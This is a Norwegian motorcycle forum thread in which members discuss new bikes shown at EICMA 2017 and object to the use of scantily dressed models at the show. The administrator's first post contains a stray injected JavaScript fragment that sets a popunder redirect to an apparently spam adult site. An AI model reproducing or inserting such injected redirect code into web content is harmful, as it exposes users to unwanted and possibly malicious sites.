EICMA 2017 - hvilke motorsykler / MC-nyheter syns du er de mest spennende?

Generelt om MC, nyheter, hendelser, film & bilder, MC i media, kjøreopplæring osv.
Svar
Brukeravatar
AJ
Administrator
Innlegg: 37829
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

EICMA 2017 - hvilke motorsykler / MC-nyheter syns du er de mest spennende?

Legg inn av AJ »

Årets store MC-messe er som kjent i gang.
MCsiden.no har sin egen mann på plass og mye av det som skjer kan leses i bloggen til kjellv.

Men det er kanskje flere MCsiden.no brukere der nede?
I så fall ville det vært ekstra hyggelig om dere legger ut bilder og meninger om hvilke sykler dere synes er de mest spennende og interessante på messa.

Selv har jeg stor sans for denne:
vitpilen_701-3.jpg
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}

Og selvfølgelig nyheten om at Moto Guzzi har utviklet en ny 850 motor med 80 HK - se egen tråd.
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

olela
Innlegg: 133
Registrert: 26 jul 2016, 09:11
Motorsykkelen din: N/A
Sted: Skien
Kontakt:

Re: EICMA 2017 - hvilke motorsykler / MC-nyheter syns du er de mest spennende?

Legg inn av olela »

Har veldig sansen for Vitpilen 701 ja. :D

Også syntes jeg ny KTM 790 Duke ser lovende ut. Håper å få testet denne neste sesong!
KTM 790 DUKE orange MY18_LeFront.jpg
Ingen ny modell, men den nye fargen Carbon på Moto Guzzi V7 III syntes jeg er flott. De røde detaljene, og da særlig toppene som stikker opp syntes jeg kler sykkelen godt.
110717-2018-moto-guzzi-v7-iii-carbon-f.jpg
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.

Brukeravatar
Skogstrollet
Innlegg: 742
Registrert: 03 okt 2016, 13:29
Motorsykkelen din: Honda CRF250L, Yamaha XSR700
Sted: Oslo

Re: EICMA 2017 - hvilke motorsykler / MC-nyheter syns du er de mest spennende?

Legg inn av Skogstrollet »

Vel, de syklene jeg er mest interessert i er dessverre kun prototyper ennå: Yamaha Tenere 700 og KTM 790 Adventure. Så da blir det nok BMW til våren... men mest sannsynlig ikke F750GS, da jeg synes den var litt av en skuffelse.
Sammenlignet med F700GS så byr den ikke på nok føler jeg.

Husqvarna 701 Svartpilen synes jeg var veldig interessant, litt kulere enn Vitpilen i min mening, men også en prototype da 🙄
"Finns ingen plats att gömma sig
Vart du än går skogen hittar dig"

Brukeravatar
Bjerknez
Innlegg: 22844
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: EICMA 2017 - hvilke motorsykler / MC-nyheter syns du er de mest spennende?

Legg inn av Bjerknez »

Kjærringa har en Husqvarna Opal 650 og er veldig fornøyd med den. Men det er jo noe annet da...

Bilde

Men apropo...
Den KTM790'en blir jo en verdig kandidat... :)

Brukeravatar
erik m
Innlegg: 547
Registrert: 30 aug 2012, 23:43
Motorsykkelen din: jawa CZ 350 56 og BMW r1100rs 93
Sted: Oslo

Re: EICMA 2017 - hvilke motorsykler / MC-nyheter syns du er de mest spennende?

Legg inn av erik m »

Mye spennende, men jeg synes det er trist at italienerne og enkelte andre nasjoner fortsatt er der at de ikke tror de får solgt sykler uten at det sitter ei modelldame oppå dem. Noen skal liksom forestille mc-bærter, med parodier på kjøreklær i plastikk. Og høyhæla partysko. Dette er dobbelt dårlig.
For det første naturligvis fordi det er kvinnediskriminerende.
For det andre fordi disse bærtene dekker halvparten av sykla på bildene - mange greier å plassere BEGGE beina så de dekker både motor, fjæring og potter. Fantastisk.

Er jeg en sur gammal gubbe som ikke liker damer? Kanskje sur og gammal, men veldig glad i damer - faktisk mer glad i damer enn i sykler til og med, og det sier ikke lite! Men da ekte damer, damer som gjerne er skikkelig kledd for en mc-tur, og ikke damer som bare er jåleri på en sykkel! Jeg tenker faktisk umiddelbart: hva er gæernt med denna sykkelen, ettersom de ikke tør å vise den fram?
hot-mess-motocorsa-1.jpg
:roll
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.

Brukeravatar
kjellv
Moderator
Innlegg: 6952
Registrert: 14 aug 2012, 23:16
Motorsykkelen din: Yamaha XT1200ZE Super Ténéré
Sted: Molde
Kontakt:

Re: EICMA 2017 - hvilke motorsykler / MC-nyheter syns du er de mest spennende?

Legg inn av kjellv »

Jeg er egentlig ganske enig med deg. Det slo meg mens jeg gikk der en halv dag at disse jentene antakelig kom til å bli veldig lei av å utføre jobben sin iht arbeidsbeskrivelsen en hel uke.. Det var tydelig å se at mange av dem egentlig så veldig lei ut av og til, men strammet seg opp og smilte pent med en gang de skjønte at de kom til å bli fotografert.
Jeg syntes ganske synd på ei som stod ute i en av gangene ved en feit Audi. Også hun hadde lite klær, men litt mer enn de som var inne. Der var det utetemperatur, altså rundt 10 grader og en del vind. Stakkars jente..

Sent fra min TA-1053 via Tapatalk


Brukeravatar
Skogstrollet
Innlegg: 742
Registrert: 03 okt 2016, 13:29
Motorsykkelen din: Honda CRF250L, Yamaha XSR700
Sted: Oslo

Re: EICMA 2017 - hvilke motorsykler / MC-nyheter syns du er de mest spennende?

Legg inn av Skogstrollet »

Føler detsamme. Some kvinnelig MC fører er det mulig det gjør meg ekstra uvel, men det gir jo et bilde av en MC-verden som i hovedsak er til for menn, og at damer kun er til pynt.
For å ikke nevne hvor mye #MeToo materiale og ekkle kommentarer som genereres der...

Nei, jeg mener ikke at alle menn er slemme, men vet at det alltid er noen som ikke kan oppføre seg.
Har selv vært med om noen kommentarer som gitt meg en litt dårlig smak, og det som (påkledd!) besøker.

Heldigvis klarer de MC folk jeg kjenner, og de jeg treffer ute på veiene, å bevise at de fleste er helt greie mennesker 😊
"Finns ingen plats att gömma sig
Vart du än går skogen hittar dig"

Svar